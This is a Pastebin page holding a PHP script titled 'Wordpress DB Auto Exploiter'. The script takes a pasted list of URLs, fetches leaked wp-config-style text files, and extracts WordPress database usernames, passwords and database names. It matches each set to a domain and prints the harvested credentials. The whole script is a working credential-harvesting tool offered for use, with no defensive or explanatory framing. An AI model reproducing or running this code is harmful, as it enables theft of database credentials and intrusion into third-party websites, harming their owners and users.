Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <center><h1>Wordpress DB Auto Exploiter</h1>
- <h3>Coded by ./Port22</h3>
- <form method="post" action="">
- <textarea name="list" rows="10" cols="80"></textarea>
- <br>
- <button>Start</button>
- </form></center>
- <?php
- include 'Curl.php';
- function getStr($string,$start,$end){
- $string = str_replace("\n", '', $string);
- $string = str_replace("\t", '', $string);
- $str = explode($start,$string,2);
- $str = explode($end,$str[1],2);
- return $str[0];
- }
- $curl = new Curl();
- error_reporting(0);
- if(isset($_POST['list'])){
- $list = $_POST['list'];
- $exuri = explode("\n", $list);
- $no = count($exuri);
- for ($i=0; $i < $no ; $i++) {
- $uri = trim($exuri[$i]);
- $get = $curl->get($uri);
- if(stristr($uri, 'wp13.txt')){
- $userWp = getStr($get, "define('DB_USER', '","'");
- $passWp = getStr($get, "define('DB_PASSWORD', '","'");
- $dbWp = getStr($get, "define('DB_NAME', '","'");
- if($userWp != '' && $passWp != ''){
- $dirtyhost = explode('/', $uri);
- $host = explode('-', $dirtyhost[4]);
- $getHost = $curl->get('http://localhost/assets/kucing.html');
- $domain = getStr($getHost, '<td align=left>',$host[0]);
- $dirtyDomain = explode('<td align=left>', $domain);
- $countDomain = count($dirtyDomain) - 1;
- $cleanDomain = getStr($dirtyDomain[$countDomain], '<font class=txt>','<font');
- echo "<font color='red'> Username :</font> $userWp | <font color='red'>Password :</font> $passWp | <font color='red'>DB :</font> $dbWp | <font color='red'>Doman :</font> $cleanDomain<br>";
- }
- }
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
